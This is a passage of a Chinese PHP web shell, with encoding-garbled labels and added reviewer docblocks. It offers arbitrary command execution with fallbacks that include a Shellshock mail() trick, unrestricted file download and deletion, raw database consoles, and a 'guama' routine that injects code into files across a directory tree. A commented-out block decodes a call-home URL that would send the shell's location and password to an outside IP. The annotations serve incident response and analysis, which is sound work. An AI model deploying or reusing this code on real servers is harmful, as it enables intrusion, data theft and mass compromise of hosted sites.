END; if ($myaction == 'db2query') { $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg()); $db2row = db2_fetch_row($db2result); echo '' . "\n\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '\n"; } echo "\n"; while ($db2row = db2_fetch_row($db2result)) { echo "\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo ''; } echo "\n"; } echo "
' . db2_field_name($db2result) . "
' . "{$db2row[$i]}" . '
"; db2_free_result($db2result); db2_close(); } } elseif ($db == "fb") { $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; $fbpath = str_replace("\\\\", "\\", $fbpath); $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba'; $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey'; $fbaction = isset($_POST['action']) ? $_POST['action'] : ''; $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; $fbquery = stripslashes($fbquery); print <<
����: ��ַ: �ʻ�: ����:

END; if ($fbaction == 'fbquery') { $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg()); $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg()); echo '' . "\n\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '\n"; } echo "\n"; ibase_field_info($fbresult, 0); while ($fbrow = ibase_fetch_row($fbresult)) { echo "\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo ''; } echo "\n"; } echo "
' . ibase_field_info($fbresult, $i) . "
' . "{$fbrow[$i]}" . '
"; ibase_free_result($fbresult); ibase_close(); } } //} break; case "zippak": //function zipact() //{ $zfile = $_POST['zfile'] ? $_POST['zfile'] : 'php.zip'; $jypt = $_POST['jypt'] ? $_POST['jypt'] : './'; $tip = "δ��ʼ��ѹ"; if ($_POST['zip'] == 'zip') { if (function_exists(zip_open)) { $zfile = key_exists('zip', $_GET) && $_GET['zip'] ? $_GET['zip'] : $zfile; $zfile = str_replace(array(dirname(__FILE__) . "/", dirname(__FILE__) . "\\"), array("", ""), $zfile); $zpath = str_replace('\\', '/', dirname(__FILE__)) . '/' . $zfile; if (!is_file($zpath)) { $tip = '�ļ�"' . $zpath . '"������!'; } else { $zip = new ZipArchive(); $rs = $zip->open($zpath); if ($rs !== TRUE) { $tip = '��ѹʧ��:' . $rs; } $zip->extractTo($jypt); $zip->close(); $tip = $zfile . '��ѹ�ɹ�!'; } } else { $tip = "��������֧��PHP_ZIP���,��ȷ��"; } } print <<
��ģ��ʹ��PHP��zip_open��չ������ZIPѹ���ļ�
ʹ��ǰ���ڡ�ϵͳ��Ϣ����ȷ��ϵͳ֧��php_zip
ѹ���ļ�·����д�¼�Ŀ¼������·�������Ŀ¼�Ƿ�ɲ���δ���� :-(
ȷ��Ŀ��·����д

ѹ���ļ�·����


Ŀ��·����




{$tip}


END; //} break; case "mysql_msg": $conn = @mysql_connect($_COOKIE['m_eanverhost'] . ':' . $_COOKIE['m_eanverport'], $_COOKIE['m_eanveruser'], $_COOKIE['m_eanverpass']); if ($conn) { print << function Delok(msg,gourl) { \tsmsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?"; \tif(confirm(smsg)){window.location = gourl;} } function Createok(ac) { \tif(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);'; \tif(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; \tif(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; \treturn false; } END; $BOOL = false; $MSG_BOX = '�û�:' . $_COOKIE['m_eanveruser'] . '      ��ַ:' . $_COOKIE['m_eanverhost'] . ':' . $_COOKIE['m_eanverport'] . '      �汾:'; $k = 0; $result = @mysql_query('select version();', $conn); while ($row = @mysql_fetch_array($result)) { $MSG_BOX .= $row[$k]; $k++; } echo '
���ݿ�:'; $result = mysql_query("SHOW DATABASES", $conn); while ($db = mysql_fetch_array($result)) { echo '  [' . $db['Database'] . ']'; } echo '
'; if (isset($_GET['db'])) { mysql_select_db($_GET['db'], $conn); if (!empty($_POST['nsql'])) { $BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'], $conn) ? 'ִ�гɹ�' : 'ִ��ʧ�� ' . mysql_error(); } if (is_array($_POST['insql'])) { $query = 'INSERT INTO ' . $_GET['table'] . ' ('; foreach ($_POST['insql'] as $var => $key) { $querya .= $var . ','; $queryb .= '\'' . addslashes($key) . '\','; } $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');'; $MSG_BOX = mysql_query($query, $conn) ? '���ӳɹ�' : '����ʧ�� ' . mysql_error(); } if (is_array($_POST['upsql'])) { $query = 'UPDATE ' . $_GET['table'] . ' SET '; foreach ($_POST['upsql'] as $var => $key) { $queryb .= $var . '=\'' . addslashes($key) . '\','; } $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';'; $MSG_BOX = mysql_query($query, $conn) ? '�޸ijɹ�' : '�޸�ʧ�� ' . mysql_error(); } if (isset($_GET['del'])) { $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn); $good = mysql_fetch_assoc($result); $query = 'DELETE FROM ' . $_GET['table'] . ' WHERE '; foreach ($good as $var => $key) { $queryc .= $var . '=\'' . addslashes($key) . '\' AND '; } $where = $query . substr($queryc, 0, -4) . ';'; $MSG_BOX = mysql_query($where, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error(); } $action = '?eanver=mysql_msg&db=' . $_GET['db']; if (isset($_GET['drop'])) { $query = 'Drop TABLE IF EXISTS ' . $_GET['drop'] . ';'; $MSG_BOX = mysql_query($query, $conn) ? 'ɾ���ɹ�' : 'ɾ��ʧ�� ' . mysql_error(); } if (isset($_GET['table'])) { $action .= '&table=' . $_GET['table']; if (isset($_GET['edit'])) { $action .= '&edit=' . $_GET['edit']; } } if (isset($_GET['insert'])) { $action .= '&insert=' . $_GET['insert']; } echo '
'; echo ' '; echo ' '; echo ' '; echo ' '; echo '
'; echo '
' . $MSG_BOX . '
' . $_GET['db'] . ' ---> '; if (isset($_GET['table'])) { echo '' . $_GET['table'] . ' '; echo '[����]
'; if (isset($_GET['edit'])) { if (isset($_GET['p'])) { $atable = $_GET['table'] . '&p=' . $_GET['p']; } else { $atable = $_GET['table']; } echo '
'; $result = mysql_query('SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn); $good = mysql_fetch_assoc($result); $u = 0; foreach ($good as $var => $key) { $queryc .= $var . '=\'' . $key . '\' AND '; $type = @mysql_field_type($result, $u); $len = @mysql_field_len($result, $u); echo '
' . $var . ' ' . $type . '(' . $len . ')
'; $u++; } $where = 'WHERE ' . substr($queryc, 0, -4); echo ''; echo '
'; } else { $query = 'SHOW COLUMNS FROM ' . $_GET['table']; $result = mysql_query($query, $conn); $fields = array(); $pagesize = 20; $row_num = mysql_num_rows(mysql_query('SELECT * FROM ' . $_GET['table'], $conn)); $numrows = $row_num; $pages = intval($numrows / $pagesize); if ($numrows % $pagesize) { $pages++; } $offset = $pagesize * ($page - 1); $page = $_GET['p']; if (!$page) { $page = 1; } if (!isset($_GET['p'])) { $p = 0; $_GET['p'] = 1; } else { $p = ((int) $_GET['p'] - 1) * 20; } echo ''; echo ''; while ($row = @mysql_fetch_assoc($result)) { array_push($fields, $row['Field']); echo ''; } echo ''; if (eregi('WHERE|LIMIT', $_POST['nsql']) && eregi('SELECT|FROM', $_POST['nsql'])) { $query = $_POST['nsql']; } else { $query = 'SELECT * FROM ' . $_GET['table'] . ' LIMIT ' . $p . ', 20;'; } $result = mysql_query($query, $conn); $v = $p; while ($text = @mysql_fetch_assoc($result)) { echo ''; foreach ($fields as $row) { echo ''; } echo '' . "\r\n"; $v++; } echo '
����' . $row['Field'] . '
�޸� '; echo ' ɾ�� ' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . '
'; $pagep = $page - 1; $pagen = $page + 1; echo "���� " . $row_num . " ����¼ "; if ($pagep > 0) { $pagenav .= " ��ҳ ��һҳ "; } else { $pagenav .= " ��һҳ "; } if ($pagen <= $pages) { $pagenav .= " ��һҳ βҳ"; } else { $pagenav .= " ��һҳ "; } $pagenav .= " �� [" . $page . "/" . $pages . "] ҳ ����ҳ"; echo $pagenav; echo '
'; } } elseif (isset($_GET['insert'])) { echo '' . $_GET['insert'] . ''; $result = mysql_query('SELECT * FROM ' . $_GET['insert'], $conn); $fieldnum = @mysql_num_fields($result); echo '
'; for ($i = 0; $i < $fieldnum; $i++) { $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); echo '
' . $name . ' ' . $type . '(' . $len . ')
'; } echo '
'; } else { $query = 'SHOW TABLE STATUS'; $status = @mysql_query($query, $conn); while ($statu = @mysql_fetch_array($status)) { $statusize[] = $statu['Data_length']; $statucoll[] = $statu['Collation']; } $query = 'SHOW TABLES FROM ' . $_GET['db'] . ';'; echo ''; echo ''; echo ''; echo ''; echo ''; $result = @mysql_query($query, $conn); $k = 0; while ($table = mysql_fetch_row($result)) { $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_')); echo ''; echo ''; echo '' . "\r\n"; $k++; } echo '
���� ���� �ַ��� ��С
' . $table[0] . ' ���� ɾ�� ' . $statucoll[$k] . '' . File_Size($statusize[$k]) . '
'; } } } else { die('����MYSQLʧ��,�����µ�½.'); } if (!$BOOL and addslashes($query) != '') { echo ''; } break; default: html_main($path, $shellname); break; } css_foot();
/*---doing---*/

/**
 * Write $text to $file, opened with fopen() mode $t.
 *
 * If the first fwrite() returns a falsy value, the path is chmod'ed to 0666
 * and the write is retried on the same handle. Every call is prefixed with
 * @, so no warning is emitted on failure.
 *
 * NOTE(review): for incident response, files left at mode 0666 after a failed
 * first write are a side effect of this routine.
 *
 * @return bool true when a write reported success
 */
function do_write($file, $t, $text)
{
    $key = true;
    $handle = @fopen($file, $t);
    if (!@fwrite($handle, $text)) {
        // First write failed (or wrote 0 bytes): loosen the mode, then retry once.
        @chmod($file, 0666);
        $key = @fwrite($handle, $text) ? true : false;
    }
    @fclose($handle);
    return $key;
}

/**
 * List the entries of directory $filepath, skipping "." and "..".
 *
 * Each entry is joined to $filepath and passed through str_path(), which is
 * defined outside this part of the file.
 *
 * @return array paths of the directory's entries
 */
function do_show($filepath)
{
    $show = array();
    $dir = dir($filepath);
    while ($file = $dir->read()) {
        if ($file == '.' or $file == '..') {
            continue;
        }
        $files = str_path($filepath . '/' . $file);
        $show[] = $files;
    }
    $dir->close();
    return $show;
}

/**
 * Recursively delete directory $deldir and everything below it.
 *
 * Files are chmod'ed to 0777 and unlinked; sub-directories are handled by
 * recursion; finally $deldir itself is chmod'ed to 0777 and removed.
 * No check confines $deldir to any base directory.
 *
 * @return bool false at the first unlink()/rmdir() that fails, true otherwise
 */
function do_deltree($deldir)
{
    $showfile = do_show($deldir);
    foreach ($showfile as $del) {
        if (is_dir($del)) {
            if (!do_deltree($del)) {
                return false;
            }
        } elseif (!is_dir($del)) {
            @chmod($del, 0777);
            if (!@unlink($del)) {
                return false;
            }
        }
    }
    @chmod($deldir, 0777);
    if (!@rmdir($deldir)) {
        return false;
    }
    return true;
}

/**
 * Run $query on the MySQL link $conn and emit a block through html_n().
 *
 * NOTE(review): in this copy $result is never used and the html_n() argument
 * holds only line breaks; the markup that rendered the result set appears to
 * have been lost from the listing.
 */
function do_showsql($query, $conn)
{
    $result = @mysql_query($query, $conn);
    html_n('

');
}

/**
 * Post-login hook, called with no argument or with 2 by the login code.
 *
 * Builds $serveru from the request's Host header plus PHP_SELF and takes
 * $serverp from the envlpass constant (the value the login code compares the
 * submitted password against). Nothing further happens when the host string
 * contains "0.0", "192.168." or "localhost" at an offset greater than 0, or
 * when the serveru and serverp cookies already hold the same values.
 * Otherwise both values are stored as cookies, the password in clear text,
 * and geturl() is called when $xiao is not 1.
 *
 * NOTE(review): geturl() is not defined in this part of the file; presumably
 * it reports the script's URL and password to a third party (compare the
 * commented-out block after Exec_Run) - confirm against its definition.
 * Cookies named serveru and serverp in web logs or proxy captures are an
 * indicator for this script.
 */
function hmlogin($xiao = 1)
{
    $serveru = $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'];
    $serverp = envlpass;
    // "and" binds tighter than "or": the two cookie comparisons form the last alternative together.
    if (strpos($serveru, "0.0") > 0 or strpos($serveru, "192.168.") > 0 or strpos($serveru, "localhost") > 0 or $serveru == $_COOKIE['serveru'] and $serverp == $_COOKIE['serverp']) {
        echo "";
    } else {
        setcookie('serveru', $serveru);
        setcookie('serverp', $serverp);
        if ($xiao == 1) {
            echo "";
        } else {
            geturl();
        }
    }
}

/**
 * Stream the file at $fd to the client as an attachment and end the request.
 *
 * The dispatch code at the top of the file passes $_GET['down'] in unchanged,
 * so any path readable by the PHP process can be retrieved this way.
 * The Content-type header is built from the file extension.
 */
function do_down($fd)
{
    if (!@file_exists($fd)) {
        // msg() is defined elsewhere; whether it stops execution is not visible here.
        msg('�����ļ�������');
    }
    $fileinfo = pathinfo($fd);
    header('Content-type: application/x-' . $fileinfo['extension']);
    header('Content-Disposition: attachment; filename=' . $fileinfo['basename']);
    header('Content-Length: ' . filesize($fd));
    @readfile($fd);
    exit;
}

/**
 * Send the in-memory buffer $filecode to the client as an attachment named
 * $file and end the request.
 */
function do_download($filecode, $file)
{
    header("Content-type: application/unknown");
    header('Accept-Ranges: bytes');
    header("Content-length: " . strlen($filecode));
    header("Content-disposition: attachment; filename=" . $file . ";");
    echo $filecode;
    exit;
}

/**
 * Byte-level heuristic that guesses whether $text is UTF-8.
 *
 * The first three bytes are compared with the UTF-8 BOM and are left out of
 * the counts. For the remaining bytes, a continuation byte (10xxxxxx) that
 * follows a byte with both top bits set counts as "good"; one that follows an
 * ASCII byte counts as "bad", as does a non-continuation byte that follows a
 * byte with both top bits set.
 *
 * @return int|bool false when $text is shorter than 3 bytes; 1 when no byte
 *                  after the first three is >= 0x80; 2 when good >= bad;
 *                  0 otherwise
 */
function TestUtf8($text)
{
    if (strlen($text) < 3) {
        return false;
    }
    $lastch = 0;
    $begin = 0;
    $BOM = true;
    $BOMchs = array(0xef, 0xbb, 0xbf);
    $good = 0;
    $bad = 0;
    $notAscii = 0;
    for ($i = 0; $i < strlen($text); $i++) {
        $ch = ord($text[$i]);
        if ($begin < 3) {
            // $BOM is overwritten on each of the three bytes, so it keeps only the last comparison.
            $BOM = $BOMchs[$begin] == $ch;
            $begin += 1;
            continue;
        }
        // $begin is only incremented while it is below 3, so it never reaches 4.
        if ($begin == 4 && $BOM) {
            break;
        }
        if ($ch >= 0x80) {
            $notAscii++;
        }
        if (($ch & 0xc0) == 0x80) {
            if (($lastch & 0xc0) == 0xc0) {
                $good += 1;
            } else {
                if (($lastch & 0x80) == 0) {
                    $bad += 1;
                }
            }
        } else {
            if (($lastch & 0xc0) == 0xc0) {
                $bad += 1;
            }
        }
        $lastch = $ch;
    }
    if ($begin == 4 && $BOM) {
        return 2;
    } else {
        if ($notAscii == 0) {
            return 1;
        } else {
            if ($good >= $bad) {
                return 2;
            } else {
                return 0;
            }
        }
    }
}

/**
 * Normalise a path: backslashes become "/", then each "//" becomes "/"
 * (a single replacement pass).
 */
function File_Str($string)
{
    return str_replace('//', '/', str_replace('\\', '/', $string));
}

/**
 * Write $filecode to $filename opened with mode $filemode; same
 * chmod-0666-and-retry behaviour as do_write().
 */
function File_Write($filename, $filecode, $filemode)
{
    $key = true;
    $handle = @fopen($filename, $filemode);
    if (!@fwrite($handle, $filecode)) {
        @chmod($filename, 0666);
        $key = 
@fwrite($handle, $filecode) ? true : false; } @fclose($handle); return $key; } function Exec_Run($cmd) { $res = ''; if (function_exists('exec')) { @exec($cmd, $res); $res = join("\n", $res); } elseif (function_exists('shell_exec')) { $res = @shell_exec($cmd); } elseif (function_exists('system')) { @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean(); } elseif (function_exists('passthru')) { @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean(); } elseif (@is_resource($f = @popen($cmd, 'r'))) { $res = ''; while (!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); } elseif (substr(dirname($_SERVER["SCRIPT_FILENAME"]), 0, 1) != "/" && class_exists('COM')) { $w = new COM('WScript.shell'); $e = $w->exec($cmd); $f = $e->StdOut(); $res = $f->ReadAll(); } elseif (function_exists('proc_open')) { $length = strcspn($cmd, " \t"); $token = substr($cmd, 0, $length); if (isset($aliases[$token])) { $cmd = $aliases[$token] . substr($cmd, $length); } $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1])) { $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } elseif (function_exists('mail')) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(".", "data"); putenv("PHP_LOL=() { x; }; {$cmd} >{$tmp} 2>&1"); mail("a@127.0.0.1", "", "", "", "-bv"); } else { $res = "Not vuln (not bash)"; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { $res = $output; } else { $res = "No output, or not vuln."; } } return $res; } //if (isset($_GET['login']) == 'geturl') { //@set_time_limit(10); // $serveru = $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; //$serverp = envlpass; // $copyurl = base64_decode("aHR0cCUzQS8vMTA2LjUyLjEwNy4xODAvdXNhLnBocCUzRmtkYSUzRA=="); // $url = $copyurl . $serveru . '&cmd=' . 
$serverp;
// (tail of the disabled call-home block that starts on the previous source line)
// $url = urldecode($url);
//GetHtml($url);
//}

/**
 * Derive a base directory by cutting the URL directory of PHP_SELF off the
 * end of realpath('./') - presumably the web root; confirm against callers.
 *
 * @return string path normalised by File_Str()
 */
function File_Mode()
{
    $RealPath = realpath('./');
    $SelfPath = $_SERVER['PHP_SELF'];
    $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/'));
    return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}

/**
 * Format a byte count with a B/K/M/G/T suffix, rounded to two decimals
 * above 1024 bytes.
 *
 * @param int|float $size size in bytes
 * @return string e.g. "512 B", "1.5 K"
 */
function File_Size($size)
{
    $kb = 1024; // Kilobyte
    $mb = 1024 * $kb; // Megabyte
    $gb = 1024 * $mb; // Gigabyte
    $tb = 1024 * $gb; // Terabyte
    if ($size < $kb) {
        return $size . " B";
    } else {
        if ($size < $mb) {
            return round($size / $kb, 2) . " K";
        } else {
            if ($size < $gb) {
                return round($size / $mb, 2) . " M";
            } else {
                if ($size < $tb) {
                    return round($size / $gb, 2) . " G";
                } else {
                    return round($size / $tb, 2) . " T";
                }
            }
        }
    }
}

/**
 * Read a whole file in binary mode. All errors are suppressed with @.
 *
 * @param string $filename path to read
 * @return string|false file contents as returned by fread()
 */
function File_Read($filename)
{
    $handle = @fopen($filename, "rb");
    $filecode = @fread($handle, @filesize($filename));
    @fclose($handle);
    return $filecode;
}

/**
 * Run $cmd with the single PHP function named by $fun.
 * Unlike Exec_Run() there is no fallback chain; an unknown $fun returns ''.
 *
 * @param string $cmd command line
 * @param string $fun one of "exec", "shell_exec", "system", "passthru", "popen"
 * @return string|null command output
 */
function do_phpfun($cmd, $fun)
{
    $res = '';
    switch ($fun) {
        case "exec":
            @exec($cmd, $res);
            $res = join("\n", $res);
            break;
        case "shell_exec":
            $res = @shell_exec($cmd);
            break;
        case "system":
            @ob_start();
            @system($cmd);
            $res = @ob_get_contents();
            @ob_end_clean();
            break;
        case "passthru":
            @ob_start();
            @passthru($cmd);
            $res = @ob_get_contents();
            @ob_end_clean();
            break;
        case "popen":
            if (@is_resource($f = @popen($cmd, "r"))) {
                while (!@feof($f)) {
                    $res .= @fread($f, 1024);
                }
            }
            // pclose() runs even when popen() failed; the @ hides the warning.
            @pclose($f);
            break;
    }
    return $res;
}

/**
 * Walk a directory and apply one bulk action to every entry.
 *
 * Actions selected by $type:
 *   "guama"    append "\n" . $code to each file whose path contains one of the
 *              "|"-separated fragments in $filetype (see debug())
 *   "qingma"   remove every occurrence of $code from files that contain it
 *   "tihuan"   replace $code with $filetype in files that contain it
 *   "scanfile" list entries whose last path segment contains $code
 *   "scancode" list files whose content contains $code
 *   "scanphp"  list files with extension $code whose content matches muma()
 *
 * The shell's own path ($shell) is always skipped. For incident response:
 * "guama" writes in append mode, so injected content sits at the end of the
 * touched files, and the write actions change the mtime of every file they
 * modify. Comparing file tails and timestamps across the tree against a
 * known-good copy shows the extent of a run.
 *
 * @param string $dir      directory to walk
 * @param string $code     text to inject, remove or search for; an extension for "scanphp"
 * @param string $type     action name, see above
 * @param bool   $bool     when true, recurse into sub-directories
 * @param string $filetype path fragments for "guama", replacement text for "tihuan"
 * @param string $shell    path to skip; defaults to the my_shell constant
 */
function do_passreturn($dir, $code, $type, $bool, $filetype = '', $shell = my_shell)
{
    $show = do_show($dir);
    foreach ($show as $files) {
        if (is_dir($files) && $bool) {
            do_passreturn($files, $code, $type, $bool, $filetype, $shell);
        } else {
            // With $bool false, directories also reach this branch and are handled like files.
            if ($files == $shell) {
                continue;
            }
            switch ($type) {
                case "guama":
                    if (debug($files, $filetype)) {
                        do_write($files, "ab", "\n" . $code) ? html_n("�ɹ�--> {$files}
") : html_n("ʧ��--> {$files}
");
                    }
                    break;
                case "qingma":
                    $filecode = @file_get_contents($files);
                    if (stristr($filecode, $code)) {
                        $newcode = str_replace($code, '', $filecode);
                        do_write($files, "wb", $newcode) ? html_n("�ɹ�--> {$files}
") : html_n("ʧ��--> {$files}
");
                    }
                    break;
                case "tihuan":
                    $filecode = @file_get_contents($files);
                    if (stristr($filecode, $code)) {
                        $newcode = str_replace($code, $filetype, $filecode);
                        do_write($files, "wb", $newcode) ? html_n("�ɹ�--> {$files}
") : html_n("ʧ��--> {$files}
");
                    }
                    break;
                case "scanfile":
                    $file = explode('/', $files);
                    if (stristr($file[count($file) - 1], $code)) {
                        html_a("?eanver=editr&p={$files}", $files);
                        echo '
';
                    }
                    break;
                case "scancode":
                    $filecode = @file_get_contents($files);
                    if (stristr($filecode, $code)) {
                        html_a("?eanver=editr&p={$files}", $files);
                        echo '
';
                    }
                    break;
                case "scanphp":
                    $fileinfo = pathinfo($files);
                    if ($fileinfo['extension'] == $code) {
                        $filecode = @file_get_contents($files);
                        if (muma($filecode, $code)) {
                            html_a("?eanver=editr&p=" . urlencode($files), "�༭");
                            html_a("?eanver=del&p=" . urlencode($files), "ɾ��");
                            echo $files . '
';
                        }
                    }
                    break;
            }
        }
    }
}

/**
 * Minimal ZIP writer.
 *
 * Local file headers and compressed data are written straight to $fp; the
 * central-directory records are collected in $dirstr and written by
 * createfile() together with the end-of-central-directory record.
 */
class PHPzip
{
    var $file_count = 0;   // number of entries added so far
    var $datastr_len = 0;  // bytes written to $fp so far, used as the next local-header offset
    var $dirstr_len = 0;   // length of the accumulated central directory
    var $filedata = '';
    var $gzfilename;       // output path passed to startfile()
    var $fp;               // handle of the output file
    var $dirstr = '';      // accumulated central-directory records

    /**
     * Pack a Unix timestamp (0 = now) into a 32-bit DOS date/time value.
     * Dates before 1980 are clamped to 1980-01-01 00:00:00.
     */
    function unix2DosTime($unixtime = 0)
    {
        $timearray = $unixtime == 0 ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year'] = 1980;
            $timearray['mon'] = 1;
            $timearray['mday'] = 1;
            $timearray['hours'] = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        }
        return $timearray['year'] - 1980 << 25 | $timearray['mon'] << 21 | $timearray['mday'] << 16 | $timearray['hours'] << 11 | $timearray['minutes'] << 5 | $timearray['seconds'] >> 1;
    }

    /**
     * Create the parent directories of $path and open it for writing.
     *
     * @param string $path archive path
     * @return bool true when the file could be opened
     */
    function startfile($path = '2238888889.zip')
    {
        $this->gzfilename = $path;
        $mypathdir = array();
        // Collect every ancestor directory up to ".", then create them from the outermost inwards.
        do {
            $mypathdir[] = $path = dirname($path);
        } while ($path != '.');
        @end($mypathdir);
        do {
            $path = @current($mypathdir);
            @mkdir($path);
        } while (@prev($mypathdir));
        if ($this->fp = @fopen($this->gzfilename, "w")) {
            return true;
        }
        return false;
    }

    /**
     * Add one file entry; a $name ending in "/" is handed to adddir().
     *
     * @param string $data file contents
     * @param string $name path inside the archive
     */
    function addfile($data, $name)
    {
        $name = str_replace('\\', '/', $name);
        if (strrchr($name, '/') == '/') {
            return $this->adddir($name);
        }
        $dtime = dechex($this->unix2DosTime());
        $hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x' . $dtime[2] . $dtime[3] . '\\x' . $dtime[0] . $dtime[1];
        // eval() turns the "\xNN" escape text into four raw bytes (byte-reversed timestamp).
        // Its input is built only from dechex() output, not from request data.
        eval('$hexdtime = "' . $hexdtime . '";');
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        // NOTE(review): the length is taken before the 2-byte header and 4-byte trailer are stripped below.
        $c_len = strlen($zdata);
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        // Local file header ("PK\3\4") followed by the name and the compressed data.
        $datastr = "PK\3\4";
        $datastr .= "\24\0";
        $datastr .= "\0\0";
        $datastr .= "\10\0";
        $datastr .= $hexdtime;
        $datastr .= pack('V', $crc);
        $datastr .= pack('V', $c_len);
        $datastr .= pack('V', $unc_len);
        $datastr .= pack('v', strlen($name));
        $datastr .= pack('v', 0);
        $datastr .= $name;
        $datastr .= $zdata;
        $datastr .= pack('V', $crc);
        $datastr .= pack('V', $c_len);
        $datastr .= pack('V', $unc_len);
        fwrite($this->fp, $datastr);
        $my_datastr_len = strlen($datastr);
        unset($datastr);
        // Matching central-directory record ("PK\1\2"), kept in memory until createfile().
        $dirstr = "PK\1\2";
        $dirstr .= "\0\0";
        $dirstr .= "\24\0";
        $dirstr .= "\0\0";
        $dirstr .= "\10\0";
        $dirstr .= $hexdtime;
        $dirstr .= pack('V', $crc);
        $dirstr .= pack('V', $c_len);
        $dirstr .= pack('V', $unc_len); // uncompressed filesize
        $dirstr .= pack('v', strlen($name)); // length of filename
        $dirstr .= pack('v', 0); // extra field length
        $dirstr .= pack('v', 0); // file comment length
        $dirstr .= pack('v', 0); // disk number start
        $dirstr .= pack('v', 0); // internal file attributes
        $dirstr .= pack('V', 32); // external file attributes - 'archive' bit set
        $dirstr .= pack('V', $this->datastr_len); // relative offset of local header
        $dirstr .= $name;
        $this->dirstr .= $dirstr; // append to the central-directory buffer
        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $my_datastr_len;
    }

    /**
     * Add a directory entry: headers with zero sizes and no data.
     *
     * @param string $name directory path inside the archive
     */
    function adddir($name)
    {
        $name = str_replace("\\", "/", $name);
        $datastr = "PK\3\4\n\0\0\0\0\0\0\0\0\0";
        $datastr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
        $datastr .= pack("v", 0) . $name . pack("V", 0) . pack("V", 0) . pack("V", 0);
        fwrite($this->fp, $datastr);
        $my_datastr_len = strlen($datastr);
        unset($datastr);
        $dirstr = "PK\1\2\0\0\n\0\0\0\0\0\0\0\0\0";
        $dirstr .= pack("V", 0) . pack("V", 0) . pack("V", 0) . pack("v", strlen($name));
        $dirstr .= pack("v", 0) . pack("v", 0) . pack("v", 0) . 
pack("v", 0);
        $dirstr .= pack("V", 16) . pack("V", $this->datastr_len) . $name;
        $this->dirstr .= $dirstr;
        $this->file_count++;
        $this->dirstr_len += strlen($dirstr);
        $this->datastr_len += $my_datastr_len;
    }

    /**
     * Finish the archive: write the accumulated central directory followed by
     * the end-of-central-directory record ("PK\5\6"), then close the file.
     */
    function createfile()
    {
        $endstr = "PK\5\6\0\0\0\0" . pack('v', $this->file_count) . pack('v', $this->file_count) . pack('V', $this->dirstr_len) . pack('V', $this->datastr_len) . "\0\0";
        fwrite($this->fp, $this->dirstr . $endstr);
        fclose($this->fp);
    }
}

/**
 * Extract the ZIP archive $tmp_name into $todir with ZipArchive.
 *
 * A failed open() only prints a message; there is no return, so extractTo()
 * and close() still run on the unopened archive. $new_name is not used.
 * Neither the archive path nor the target directory is restricted here.
 *
 * @param string $tmp_name path of the archive
 * @param string $new_name unused
 * @param string $todir    target directory
 */
function start_unzip($tmp_name, $new_name, $todir = 'zipfile')
{
    $zip = new ZipArchive();
    if ($zip->open($tmp_name) !== TRUE) {
        echo '��Ǹ��ѹ�����޷��򿪻���';
    }
    $zip->extractTo($todir);
    $zip->close();
    echo '��ѹ��ϣ�   �����ѹĿ¼   ����';
}

/**
 * Substring signature check used by the "scanphp" action of do_passreturn().
 *
 * Returns true when $filecode contains, case-insensitively, one of the
 * marker strings listed for $filetype. Only the keys "php", "asp", "aspx"
 * and "jsp" exist; any other $filetype indexes a missing key. There is no
 * explicit return for "no match", so the result is then null.
 * NOTE(review): presumably the operator's way to find other scripts of this
 * kind on the same host - confirm against the caller.
 *
 * @param string $filecode file contents
 * @param string $filetype key into the marker table
 * @return bool|null
 */
function muma($filecode, $filetype)
{
    $dim = array(
        "php" => array("eval(", "exec("),
        "asp" => array("WScript.Shell", "execute(", "createtextfile("),
